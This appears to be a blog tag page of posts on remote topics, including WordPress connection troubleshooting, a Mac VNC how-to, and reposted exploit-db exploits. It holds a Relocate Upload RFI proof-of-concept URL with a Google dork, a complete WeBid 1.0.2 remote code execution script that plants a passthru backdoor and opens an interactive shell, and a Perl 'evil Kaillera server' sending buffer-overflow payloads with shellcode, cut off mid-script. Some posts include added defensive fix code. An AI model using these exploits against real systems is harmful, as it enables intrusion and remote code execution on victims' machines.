AppUnix

Tag: remote

Any connection from WordPress to XXX gives the WordPress error: An unexpected error occurred.

23/11/2016 by OwnServer

If you are getting the message -> Ocorreu um erro inesperado (An unexpected error occurred) <- when trying to do ANYTHING remote from WordPress (install a version, update a plugin, install a plugin, view Akismet, etc.), don't worry; the way out is simple and clear:

1 – Check that outbound port 80 is open in your firewall (it is good to also open 443 for SSL),

2 – Check that the WordPress folders have the correct permissions (755 under suExec, or 777 with DSO without suExec), and likewise that the PHP files have the correct permissions -> 644.

3 – If the two points above are fine, ask the server admin to run a test: in the file /etc/resolv.conf, have them put at the beginning of the file:

nameserver 8.8.8.8

nameserver 8.8.4.4

These two nameservers resolve publicly using Google's "puny" infrastructure.
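The three checks can be run from the web server itself as one script; this is an added example, not part of the original post. It tests DNS resolution and outbound TCP on ports 80 and 443 to api.wordpress.org (the host WordPress contacts for updates and plugin installs) and audits directory and PHP file modes against the 755/644 values the post gives for suExec; the path /var/www/html is an assumed default.

```php
<?php
// Added example, not from the original post: run the post's three checks from
// the WordPress host itself. Usage: php wp_remote_check.php /path/to/wordpress

// 1. DNS: gethostbyname() returns the name unchanged when resolution fails,
//    which is the symptom a broken /etc/resolv.conf produces.
function check_dns(string $host): ?string {
    $ip = gethostbyname($host);
    return ($ip === $host) ? null : $ip;
}

// 2. Outbound firewall: a plain TCP connect with a short timeout. A blocked
//    egress port shows up here as a timeout or "connection refused".
function check_outbound(string $host, int $port, int $timeout = 5): bool {
    $errno = 0;
    $errstr = '';
    $fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
    if ($fp === false) {
        fwrite(STDERR, "  $host:$port -> $errstr ($errno)\n");
        return false;
    }
    fclose($fp);
    return true;
}

// 3. Permissions: directories that are not 0755 and PHP files that are not
//    0644 (the suExec layout the post describes). Returns path => octal mode.
function audit_permissions(string $root): array {
    $bad = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $path => $info) {
        $mode = fileperms($path) & 0777;
        if ($info->isDir() && $mode !== 0755) {
            $bad[$path] = decoct($mode);
        } elseif ($info->isFile() && substr($path, -4) === '.php' && $mode !== 0644) {
            $bad[$path] = decoct($mode);
        }
    }
    return $bad;
}

$root = $argv[1] ?? '/var/www/html';   // assumed default path
$host = 'api.wordpress.org';           // the host WordPress contacts for updates

echo "DNS for $host: ", check_dns($host) ?? 'FAILED (check /etc/resolv.conf)', "\n";
foreach ([80, 443] as $port) {
    echo "Outbound TCP $port: ", check_outbound($host, $port) ? 'ok' : 'BLOCKED', "\n";
}
$bad = audit_permissions($root);
echo "Permission findings under $root: ", count($bad), "\n";
foreach ($bad as $path => $mode) {
    echo "  $mode  $path\n";
}
```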

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 by OwnServer

# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter
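The defensive rewrite, as an added example that is not the plugin's code: derive the WordPress root from the plugin file's own location instead of the abspath parameter, or better, serve the request through WordPress's admin-ajax hooks so the plugin never has to locate wp-load.php at all. The action name ru_move_folder and the helper names are hypothetical.

```php
<?php
// Added example, not the plugin's own code: two ways to avoid taking the
// WordPress root from a GET parameter as relocate-upload.php 0.14 does.

// Option A: walk up from this file's own directory until wp-load.php is found.
// The starting point is __DIR__, never request data, so neither a remote URL
// nor a foreign local path can be injected; the search stops at the root.
function ru_locate_wp_load(string $start): ?string {
    $dir = realpath($start);
    while ($dir !== false) {
        $candidate = $dir . DIRECTORY_SEPARATOR . 'wp-load.php';
        if (is_file($candidate)) {
            return $candidate;
        }
        $parent = dirname($dir);
        if ($parent === $dir) {          // reached the filesystem root
            return null;
        }
        $dir = $parent;
    }
    return null;
}

// Option B (what a plugin should do): register the handler on admin-ajax.php.
// WordPress is already bootstrapped, and a nonce plus a capability check run
// before anything touches the filesystem. Action and function names are
// hypothetical.
if (function_exists('add_action')) {
    add_action('wp_ajax_ru_move_folder', 'ru_move_folder');
}

function ru_move_folder(): void {
    check_ajax_referer('ru_move_folder');            // dies on a missing or forged nonce
    if (!current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }
    $folder = sanitize_text_field(wp_unslash($_GET['ru_folder'] ?? ''));
    // ... the move itself would go here, constrained to wp_upload_dir() ...
    wp_send_json_success(['folder' => $folder]);
}

// Drop-in replacement for the vulnerable line
//   require_once(urldecode($_GET['abspath']).'/wp-load.php');
// when the standalone entry point must be kept for compatibility:
if (isset($_GET['ru_folder']) && !defined('ABSPATH')) {
    $wpLoad = ru_locate_wp_load(__DIR__);
    if ($wpLoad === null) {
        http_response_code(500);
        exit('wp-load.php not found');
    }
    define('WP_USE_THEMES', false);
    require_once $wpLoad;
}
```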

Source: http://www.exploit-db.com/exploits/17869/

How to connect to Mac OS X Snow Leopard | Lion via Remote Desktop

10/08/2011 by OwnServer

Well, folks, we at 4ppun1x connected remotely to this wonderful BSD that is the Mac so we could make remote adjustments on our PC. This how-to boils down to enabling the Mac's VNC support along with a security password, so our Mac stays calm and safe accepting network connections without any stress.
We are using Mac OS X Snow Leopard (but it works on Mac OS X Lion), an ordinary connection (through a wireless router), Windows (oops, Windoze) Seven, and the TightVNC VNC client (download link below), which besides being free works really well.
Shall we get going and cut the chatter?

First we need to go into System Preferences to reach the Mac's main configuration menus; follow the screenshot:

Clicking the Mac preferences menu

Now we click the preferences menu:

Main menus: SHARING

There, we go to the Sharing area (this is where we enable Apache, remote access, file sharing, etc.):

Checking remote access

As soon as we check the REMOTE MANAGEMENT option, the menu in the screenshot above is displayed.

We'll comment on each checked option:

1 – Observe (observation mode): we check Control to allow the remote access (in this case our Window$ 7 PC) to take control. The option to show when someone is observing the PC is good to have checked (yeah, my friend, someone inside without you knowing is rough, right?),

2 – Generate Reports is good to have checked because it generates logs (in case someone does something dumb),

3 – Open and Quit app… leave it checked; after all, this lets the remote client run applications,

4 – Change Settings, well, in a setup scenario, why not leave it on? It's worth it! If you need a tweak here or there you should have this ON.

5 – Delete and replace items is good; after all, read, write and execute rights are pretty much standard for remote access.

6 – Start text… is good when you want to chat with the remote client; we leave it on.

7 – Restart and Shutdown, my friend, if someone needs to apply critical, positive changes to your Mac OS X, why not leave this feature available to remote access? If you find it unacceptable that someone could remotely shut down your Apple, leave it unchecked.

8 – Support for copying items is good ;), leave it on.

As soon as we click OK, the user's authorization is requested to validate the change, but for it to really take effect we must click the COMPUTER SETTINGS option to get things just right (this is where we set the remote access password; after all, leaving a Mac with all its global features enabled and no password is a 12-gauge shot in your own foot, right?).

Setting the password and confirming

Under VNC viewers, set the password (use something with special characters to make life harder for lamers; mix #$%&*@./<> into the password characters).

Once you apply, you'll need to confirm with your system user password; confirm with your password (see the next screenshot):

Confirming the password on Mac OS X

It may be that we (appunix and you), some day in this life of manual labor, ask ourselves:

How do I find my IP on this darn Mac?

Relax, remember the Mac's preferences hub? So, we confirm Sharing and go back there, to the Network menu, that is: System Preferences -> Network.

See the icon in the MIDDLE of the preferences hub:

Mac OS X System Preferences hub

There, then just click Network and go for it; look at the darn IP in the MIDDLE of the new screen:

There's the big ol' IP, folks

There, we now have the IP in hand; in my case it ends in 104. What do we do next?

On Microsoft Windows 7 we need to download the free VNC client; for that, go to the link:

http://www.tightvnc.com/download/1.3.10/tightvnc-1.3.10-setup.exe

Download the client and then open it.

As soon as you run TightVNC you'll see the following screen:

VNC client

Once you confirm the access it will show a screen asking for the password, just like this one here:

VNC password

Confirm with the password you set in the remote access properties of your Mac OS X and FINISH!

Liked it?

So did we.
Hugs to everyone and thanks for visiting!

WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit

04/07/2011 by OwnServer

<?php
/*

------------------------------------------------------------
WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit
------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.webidsupport.com/

This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

[-] Vulnerable code to SQL injection in feedback.php:

154. $query = "SELECT title FROM " . $DBPrefix . "auctions WHERE id = " . $_REQUEST['auction_id'] . " LIMIT 1";
155. $res = mysql_query($query);
156. $system->check_mysql($res, $query, __LINE__, __FILE__);
157. $item_title = mysql_result($res, 0, 'title');

Input passed through $_REQUEST['auction_id'] isn't properly sanitised before being used in the SQL query at line 154.

[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in logout.php:

21. if (isset($_COOKIE['WEBID_RM_ID']))
22. {
23. $query = "DELETE FROM " . $DBPrefix . "rememberme WHERE hashkey = '" . $_COOKIE['WEBID_RM_ID'] . "'";
24. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
25. setcookie('WEBID_RM_ID', '', time() - 3600);
26. }

Input passed through $_COOKIE['WEBID_RM_ID'] isn't properly sanitised before being used in the SQL query at line 23.

[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in user_login.php:

84. if (isset($_COOKIE['WEBID_ONLINE']))
85. {
86. $query = "DELETE from " . $DBPrefix . "online WHERE SESSION = '" . $_COOKIE['WEBID_ONLINE'] . "'";
87. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
88. }

Input passed through $_COOKIE['WEBID_ONLINE'] isn't properly sanitised before being used in the SQL query at line 86.
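All three queries share one defect, request data concatenated into SQL, and the fix is the same for each: bound parameters, which also remove the dependence on magic_quotes_gpc. The added example below is not WeBid's code; it assumes a mysqli connection in $db and uses $DBPrefix and the table names from the listings.

```php
<?php
// Added example, not WeBid's own code: the queries from feedback.php line 154,
// logout.php line 23 and user_login.php line 86 rewritten with bound
// parameters. Assumes a mysqli connection in $db; $DBPrefix is the listing's.

function prepare_or_fail(mysqli $db, string $sql): mysqli_stmt {
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    return $stmt;
}

// feedback.php: auction_id is an integer key, so it is checked and bound as
// one. A non-numeric value is rejected before any query is sent.
function fetch_auction_title(mysqli $db, string $DBPrefix, $auctionId): ?string {
    if (!is_scalar($auctionId) || !ctype_digit((string) $auctionId)) {
        return null;
    }
    $stmt = prepare_or_fail($db, "SELECT title FROM {$DBPrefix}auctions WHERE id = ? LIMIT 1");
    $id = (int) $auctionId;
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($title);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? $title : null;
}

// logout.php: the cookie value is bound as a string, so quotes inside it are
// data rather than syntax, whatever magic_quotes_gpc is set to.
function delete_rememberme(mysqli $db, string $DBPrefix, string $hashkey): int {
    $stmt = prepare_or_fail($db, "DELETE FROM {$DBPrefix}rememberme WHERE hashkey = ?");
    $stmt->bind_param('s', $hashkey);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

// user_login.php: same pattern for the online-session cookie.
function delete_online_session(mysqli $db, string $DBPrefix, string $session): int {
    $stmt = prepare_or_fail($db, "DELETE FROM {$DBPrefix}online WHERE SESSION = ?");
    $stmt->bind_param('s', $session);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

// Call sites mirroring the originals (the cookie handling is unchanged):
// $item_title = fetch_auction_title($db, $DBPrefix, $_REQUEST['auction_id'] ?? '');
// if (isset($_COOKIE['WEBID_RM_ID'])) {
//     delete_rememberme($db, $DBPrefix, (string) $_COOKIE['WEBID_RM_ID']);
//     setcookie('WEBID_RM_ID', '', time() - 3600);
// }
// if (isset($_COOKIE['WEBID_ONLINE'])) {
//     delete_online_session($db, $DBPrefix, (string) $_COOKIE['WEBID_ONLINE']);
// }
```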

[-] Vulnerable code to arbitrary PHP code injection (works with magic_quotes_gpc = off) in /includes/converter.inc.php:

61. function buildcache($newaarray)
62. {
63. global $include_path;
64.
65. $output_filename = $include_path . 'currencies.php';
66. $output = "<?php\n";
67. $output.= "\$conversionarray[] = '" . time() . "';\n";
68. $output.= "\$conversionarray[] = array(\n";
69.
70. for ($i = 0; $i < count($newaarray); $i++)
71. {
72. $output .= "\t" . "array('from' => '" . $newaarray[$i]['from'] . "', 'to' => '" . $newaarray[$i]['to'] . "', 'rate' => '" . $newaarray[$i]['rate'] . "')";
73. if ($i < (count($newaarray) - 1))
74. {
75. $output .= ",\n";
76. }
77. else
78. {
79. $output .= "\n";
80. }
81. }
82.
83. $output .= ");\n?>\n";
84.
85. $handle = fopen($output_filename, 'w');
86. fputs($handle, $output);
87. fclose($handle);
88. }

Input passed to the buildcache() function through $_POST['from'] or $_POST['to'] isn't properly sanitised before being written to the currencies.php file; this can lead to arbitrary PHP code injection.
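The added example below (not WeBid's code) keeps the cache-file design but validates the currency codes and rates before anything is written and emits the values with var_export(), so a quote or a closing tag arriving in $_POST['from'] becomes an escaped string literal rather than code. A JSON variant is shown alongside, since a cache is data and need not be PHP at all; $include_path is the listing's variable.

```php
<?php
// Added example, not WeBid's own code: a buildcache() that cannot be turned
// into code injection. $include_path is the listing's variable.

// Currency codes are three upper-case letters and rates are numeric; anything
// else is rejected before it gets anywhere near the generated file.
function validate_conversions(array $newaarray): array {
    $clean = [];
    foreach ($newaarray as $row) {
        $from = $row['from'] ?? '';
        $to   = $row['to']   ?? '';
        $rate = $row['rate'] ?? '';
        if (!is_string($from) || !preg_match('/^[A-Z]{3}$/', $from)
            || !is_string($to) || !preg_match('/^[A-Z]{3}$/', $to)) {
            throw new InvalidArgumentException('invalid currency code');
        }
        if (!is_numeric($rate)) {
            throw new InvalidArgumentException("invalid rate for $from/$to");
        }
        $clean[] = ['from' => $from, 'to' => $to, 'rate' => (float) $rate];
    }
    return $clean;
}

// Same layout as the original file (timestamp, then the array of rows), but
// the whole structure is emitted by var_export(), which escapes quotes and
// backslashes, so the output is always a PHP literal and never executable
// input. The write is atomic so a half-written cache is never included.
function buildcache_php(string $include_path, array $newaarray): void {
    $conversionarray = [time(), validate_conversions($newaarray)];
    $output = "<?php\n\$conversionarray = " . var_export($conversionarray, true) . ";\n";
    $tmp = $include_path . 'currencies.php.tmp';
    if (file_put_contents($tmp, $output, LOCK_EX) === false
        || !rename($tmp, $include_path . 'currencies.php')) {
        throw new RuntimeException('could not write currencies.php');
    }
}

// Simpler still: a cache is data, not code. Store JSON and json_decode() it
// on read; nothing in it can ever be executed.
function buildcache_json(string $include_path, array $newaarray): void {
    $payload = ['updated' => time(), 'rates' => validate_conversions($newaarray)];
    $json = json_encode($payload, JSON_THROW_ON_ERROR | JSON_PRETTY_PRINT);
    file_put_contents($include_path . 'currencies.json', $json, LOCK_EX);
}
```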

[-] Vulnerable code to LFI (works with magic_quotes_gpc = off) in /includes/converter.inc.php:

18. if (isset($_GET['lan']) && !empty($_GET['lan']))
19. {
20. if ($user->logged_in)
21. {
22. $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($_GET['lan']) . "' WHERE id = " . $user->user_data['id'];
23. }
24. else
25. {
26. // Set language cookie
27. setcookie('USERLANGUAGE', $_GET['lan'], time() + 31536000, '/');
28. }
29. $language = $_GET['lan'];
30. }
31. elseif ($user->logged_in)
32. {
33. $language = $user->user_data['language'];
34. }
35. elseif (isset($_COOKIE['USERLANGUAGE']))
36. {
37. $language = $_COOKIE['USERLANGUAGE'];
38. }
39. else
40. {
41. $language = $system->SETTINGS['defaultlanguage'];
42. }
43.
44. if (!isset($language) || empty($language)) $language = $system->SETTINGS['defaultlanguage'];
45.
46. include $main_path . 'language/' . $language . '/messages.inc.php';

Input passed through $_GET['lan'] or $_COOKIE['USERLANGUAGE'] parameter isn't properly sanitised before being used to include files on line 46. This can be exploited to include arbitrary local files.
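The include on line 46 is safe only if $language can never leave the language directory. The added example below (not WeBid's code) resolves the requested value against the directories that actually exist under language/, so traversal sequences, null bytes and absolute paths are rejected before include runs; $main_path and the settings names are the listing's.

```php
<?php
// Added example, not WeBid's own code: resolve the requested language against
// the directories that really exist under language/, then include only the
// resolved path. $main_path and the settings names are the listing's.

// Installed languages, read from the filesystem rather than from the request.
function available_languages(string $main_path): array {
    $langs = [];
    foreach (scandir($main_path . 'language') ?: [] as $entry) {
        if ($entry !== '.' && $entry !== '..'
            && preg_match('/^[A-Za-z0-9_-]+$/', $entry)
            && is_dir($main_path . 'language/' . $entry)) {
            $langs[] = $entry;
        }
    }
    return $langs;
}

// Same precedence as lines 18-44 (GET, then profile, then cookie, then the
// default), but a candidate is used only if it names an installed language.
function select_language(string $main_path, array $get, array $cookie,
                         ?string $profileLanguage, string $default): string {
    $allowed = available_languages($main_path);
    $candidates = [$get['lan'] ?? null, $profileLanguage,
                   $cookie['USERLANGUAGE'] ?? null, $default];
    foreach ($candidates as $cand) {
        if (is_string($cand) && in_array($cand, $allowed, true)) {
            return $cand;
        }
    }
    throw new RuntimeException('no installed language directory matches');
}

// Replacement for the path built on line 46: the language is a known directory
// name, and realpath() confirms the final file still lies under language/.
function messages_file(string $main_path, string $language): string {
    $base = realpath($main_path . 'language');
    $file = realpath($main_path . 'language/' . $language . '/messages.inc.php');
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file resolves outside language/');
    }
    return $file;
}

// Usage mirroring the original flow (the include stays at file scope so the
// message variables remain global, as messages.inc.php expects):
// $language = select_language($main_path, $_GET, $_COOKIE,
//     $user->logged_in ? $user->user_data['language'] : null,
//     $system->SETTINGS['defaultlanguage']);
// if (isset($_GET['lan'])) { ... store or cookie only the validated $language ... }
// include messages_file($main_path, $language);
```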

[-] Information leak vulnerability into /logs directory, because anyone can read cron.log and error.log

[-] Disclosure timeline:

[19/06/2011] - Vulnerabilities discovered
[19/06/2011] - Vendor contacted
[20/06/2011] - Vendor contacted again
[21/06/2011] - No response from vendor
[21/06/2011] - Issue reported to http://sourceforge.net/apps/mantisbt/simpleauction/view.php?id=34
[22/06/2011] - Issue reported to http://www.webidsupport.com/forums/project.php?do=issuelist&projectid=1
[22/06/2011] - Vendor responded and released patches: http://www.webidsupport.com/forums/showthread.php?3892
[04/07/2011] - Public disclosure

*/

error_reporting(E_ERROR);
set_time_limit(0);

if (!extension_loaded("curl")) die("cURL extension required\n");

$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

function http_post($page, $data)
{
global $ch, $url;

curl_setopt($ch, CURLOPT_URL, $url.$page);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

return curl_exec($ch);
}

print "\n+----------------------------------------------------------------------+";
print "\n| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------------------+\n";

if ($argc < 2)
{
print "\nUsage......: php $argv[0] \n";
print "\nExample....: php $argv[0] https://localhost/";
print "\nExample....: php $argv[0] http://localhost/webid/\n";
die();
}

$url = $argv[1];

$code = rawurlencode("\0'));print('_code_');passthru(base64_decode(\$_POST['c'])//");
http_post("converter.php", "action=convert&from=USD&to={$code}");

while(1)
{
print "\nwebid-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_post("includes/currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("\n[-] Exploit failed\n");
}
?>

Source: http://www.exploit-db.com/exploits/17487/

Kaillera Multiple Clients Buffer Overflow Vulnerabilities

30/06/2011 by OwnServer

#!/usr/bin/perl

# Exploit Title: Remote Buffer Overflows in Kaillera clients
# Date: 6/30/11
# Author: sil3nt_dre4m
# Software Link: Multiple:
# 1.  Kaillera original client: An emulator to download with this client bundled with it is Project64K 0.13: http://www.zophar.net/download_file/1907
# 2.  Supraclient 0.85.2 CPPE : This client can be found here: http://morphus56k.110mb.com/website/downloads/SupraclientCPPE_v0.85.2.zip
# 3.  Open Kaillera p2p client: http://sourceforge.net/projects/okai/files/Client/n02.p2p%20v0/n02.P2P.v0r6.client.v0.5r0.zip/download
# Version: Multiple-see below
# Tested on: Windows XP, Windows 7
#Introduction:
#This script acts as a Kaillera server in order to exploit various Kaillera clients.
#Kaillera facilitates playing emulator games over a network.
#The Kaillera protocol is built on top of UDP and is mostly documented here: http://www.emulinker.com/index.php?page=Documentation&help=true
#Kaillera clients implement this protocol, and many of them have serious vulnerabilities in their code.
#This server is capable of exploiting buffer overflows in the following clients:
#Exploit tested against Windows 7 and XP machines, gets around ASLR (modules don't have it loaded).
#Note: If you wish to exploit the same client twice, you will need to restart the server.
#To reproduce the bugs shown here:
#1.  Download the Kaillera client you wish to test bug on.
#2.  Download emulator capable of Kaillera netplay, or one which this script targets (Mame32k, and so forth).
#3.  Overwrite existing kailleraclient.dll with the one you wish to exploit (Supraclient, open kaillera, original client).
#4.  Look for something that says netplay or Kaillera, and select it.  In each emulator its different, for instance in Project64K go to File > Start Netplay.
#5.  Run this server and connect to the IP its hosted on with the kaillera client.
#Greetz to: Blindgeek and jediknight304 for much help with this script, corelanc0d3r for
#awesome tutorials on buffer overflows, and Requiem for help with fixing security bugs in Kaillera clients.
#DISCLAIMER: I'm not responsible for how you use this code.
#By running this code, you agree to accept responsibility for how you use it and you agree to not hold me responsible for any problems arising from running this code.
#Final Note: For more information on Kaillera vulnerabilities and remediation information, check out http://kaillerahacks.blogspot.com/.
use strict;
use warnings;
use IO::Socket;
use Getopt::Long;
use Digest::MD5 qw(md5);
use subs qw(sendmessage help);
### Shellcode- spawn calc.exe from Metasploit Framework - ###
my $sc =
"\x31\xc9\xdd\xc5\xb8\xe6\xd8\x80\xa4\xb1\x33\xd9\x74\x24" .
"\xf4\x5a\x31\x42\x16\x83\xea\xfc\x03\x42\xf4\x3a\x75\x58" .
"\x10\x33\x76\xa1\xe0\x24\xfe\x44\xd1\x76\x64\x0c\x43\x47" .
"\xee\x40\x6f\x2c\xa2\x70\xe4\x40\x6b\x76\x4d\xee\x4d\xb9" .
"\x4e\xde\x51\x15\x8c\x40\x2e\x64\xc0\xa2\x0f\xa7\x15\xa2" .
"\x48\xda\xd5\xf6\x01\x90\x47\xe7\x26\xe4\x5b\x06\xe9\x62" .
"\xe3\x70\x8c\xb5\x97\xca\x8f\xe5\x07\x40\xc7\x1d\x2c\x0e" .
"\xf8\x1c\xe1\x4c\xc4\x57\x8e\xa7\xbe\x69\x46\xf6\x3f\x58" .
"\xa6\x55\x7e\x54\x2b\xa7\x46\x53\xd3\xd2\xbc\xa7\x6e\xe5" .
"\x06\xd5\xb4\x60\x9b\x7d\x3f\xd2\x7f\x7f\xec\x85\xf4\x73" .
"\x59\xc1\x53\x90\x5c\x06\xe8\xac\xd5\xa9\x3f\x25\xad\x8d" .
"\x9b\x6d\x76\xaf\xba\xcb\xd9\xd0\xdd\xb4\x86\x74\x95\x57" .
"\xd3\x0f\xf4\x3d\x22\x9d\x82\x7b\x24\x9d\x8c\x2b\x4c\xac" .
"\x07\xa4\x0b\x31\xc2\x80\xe3\x7b\x4f\xa0\x6b\x22\x05\xf0" .
"\xf6\xd5\xf3\x37\x0e\x56\xf6\xc7\xf5\x46\x73\xcd\xb2\xc0" .
"\x6f\xbf\xab\xa4\x8f\x6c\xcc\xec\xf3\xf3\x5e\x6c\xda\x96" .
"\xe6\x17\x22\x53";
########Variables##############
my $adjust ="\x81\xc4\x54\xf2\xff\xff"; # add esp, -3500 adjusts the stack
my $ack="\x05\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00"; #ACK packet in Kaillera protocol, see docs
my $ServerStatus="\x04" . "\x00" x 9; # No other users shown in server.
my $oldjunk="A" x 92; #For exploiting old Kaillera client username BOF.
my $junk="A" x 2082; #For exploiting P2P Kaillera client
my $suprajunk="A" x 2048; #Supraclient junk
my $MOTDHeader="\x17" . "Server\0";
my $MOTDMessage="Hello, Welcome to the Server\0";
my $nseh="\xeb\x06\x90\x90"; #short jmp for SEH exploits
my $seh, my $eip;
my $ServerExploit;
my $username;
my %inc; #increments a counter per client connected to us, each time a message is sent
my ($port, $ip, $help, $target, $listtarget, $listemu, $emu, $delay, $debug);
$port = 27888;
GetOptions(
'port=i'=>\$port,
'ip=s' =>\$ip,
'help' =>\$help,
't=s' =>\$target,
'emu=s' =>\$emu,
'targets' =>\$listtarget,
'delay=i' =>\$delay,
'debug' =>\$debug,
'emus' =>\$listemu
);
if (defined $listtarget) {
print "\r\n=========Pick a version of Kaillera to attack :) ========\r\n\r\n" ;
print "1.  Kaillera 0.9/Anti3d  -t old \r\n\r\nPick emulator to target with -emu flag: mame32k, snes, mupen\r\n\r\n";
print "2.  SupraclientCPPE 0.85.2  -t supra:\r\n\r\nPick emulator to target with -emu flag: mame32, mupen\r\n\r\n";
print "3.  Open Kaillera n02v0r6  -t p2p (Universal Exploit)\r\n" ;
}
if (defined $listemu) {
print "\r\n=========Specific versions of emulators being attacked :) ============" . "\r\n\r\n" ;
print "Mame32k 0.64  -emu mame32k\r\n\r\n";
print "Mame32++ 0.117  -emu mame32\r\n\r\n";
print "Mupen64k 0.7.9  -emu mupen\r\n\r\n";
print "Snes9k 0.09  -emu snes\r\n";
}
help() if($help or not defined $ip or not defined $target);
#Note: add new targets like this, but make sure to use $variable when redefining, not "my $variablename" or it wont work from earlier scope.
#Also, note that target "old" uses SEH-based overflow while target "supra" uses EIP overwrite.
if ($target eq "old") {
if (not defined $emu) {
print "\r\nPick an emulator to target, this exploit isn't universal\r\n";
help();
}
if ($emu eq "mame32k") {
print "\r\nTargetting Mame32k 0.64 running with Kaillera client 0.9...\r\n";
$seh=pack('V',0x010B3A06); # #pop ebx - pop esi - ret at 0x010B3A06 [mame32k.exe]
}
elsif ($emu eq "snes") {
print "\r\nTargetting Snes9k 0.09 running with Kaillera client 0.9...\r\n";
$seh=pack('V',0x10018ECD); # pop ebx - pop ecx - ret at 0x10018ECD [sdl.dll]
}
elsif ($emu eq "mupen") {
print "\r\nTargetting Mupen64k 0.7.9 running with Kaillera client 0.9...\r\n";
$seh=pack('V', 0x67F46FEF); #pop edi - pop ebp - ret at 0x67F46FEF [mupen64_rsp_hle.dll].
}
else {
print "\r\nPick a valid emulator to target: -emus to list emulators \r\n";
help();
}
}
elsif ($target eq "p2p") {
print "\r\nTargetting P2P Client (Universal exploit)...\r\n";
if (defined $emu) {
print "\r\nUniversal exploit, no emu necessary...\r\n";
help();
}
}
elsif ($target eq "supra") {
if (not defined $emu) {
print "\r\nPick an emulator to target, this exploit isn't universal\r\n";
help();
}
if ($emu eq "mame32") {
print "\r\nTargetting Mame32++ 0.117 running with Supraclient...\r\n";
$eip=pack('V', 0x01C01104); #jmp esp in mameppkgui.exe
}
elsif ($emu eq "mupen") {
print "\r\nTargetting Mupen64k 0.7.9 running with Supraclient...\r\n";
$eip=pack('V', 0x10021C16); #jmp esp at 0x10021C16 [aziaudio.dll]
}
}
else {
print "\r\nPick a valid target, try -targets if you're lost.\r\n";
help();
}
my $hello = "HELLOD00D$port\0";
#Open a new socket, start an infinite loop receiving messages from clients
my $sock = IO::Socket::INET->new(Proto=>'udp', LocalPort=>$port) or die "Error opening $ip:$port \r\n$!";
print "Evil Kaillera Server Started on $ip:$port, waiting for victims :D\r\n";
my $msg_in;
my $MAX_MESSAGE_LENGTH=5000;
while (1) {
$sock->recv($msg_in,$MAX_MESSAGE_LENGTH);
my $packet = unpack 'H*', $msg_in;
if (defined $debug) {
print "Packet found: $packet\n";
}
my $peerhost = $sock->peeraddr;
my $peerport = $sock->peerport;
#Check for client hello, send server hello
if ($msg_in =~ m/HELLO0\.83/) {
print "Sending Hello...\n";
$sock->send($hello);
}
#Since we're using an IF loop for username detection, the scope needs to be over everything else,
#because local machine processes data faster than incoming network data.
#Otherwise, username won't be detected until AFTER ServerAnnouncement is sent and it wont work.
if ($msg_in =~ m/\x03(.*?\x00)/){
my $username = $1 ;
my $ServerAnnounce="\x02" . $username . substr(md5($username),0,2) . "\x00" x 4 . "\x01"; #Not Complete yet
if ($packet=~m/.{10}03/) {
if (defined $debug) {
print "Username $username found\r\n" . "Sending ACKs to client...\r\n";
}
sendpacket(\$sock, $ack) for (1..3);
sleep 1;
}
sendpacket(\$sock, $ServerStatus);
print "Sending ServerStatus...\r\n";
sendpacket(\$sock, $ServerAnnounce);
if ($target eq "p2p") {
print "Attacking p2p client...\r\n";
$eip=pack('V',0x100123F3); # call esp in kailleraclient.dll, universal
sendpacket(\$sock, $MOTDHeader.$junk.$eip.$sc);
print "Sending MOTD payload to P2PClient...\n";
if (defined $delay) {
sleep $delay;
}
}
if ($target eq "supra") {
print "Sending MOTD payload to Supraclient\r\n";
sendpacket(\$sock, $MOTDHeader.$suprajunk.$eip.$adjust.$sc);
if (defined $delay) {
sleep $delay;
}
}
if ($target eq "old") {
print "Sending Announce, MOTD to old kaillera client...\r\n";
sendpacket(\$sock, $MOTDHeader.$MOTDMessage);
my $ServerExploit="\x02" . $oldjunk . $nseh . $seh . $sc;
print "Sending ServerStatus payload to 0.9 client...\r\n";
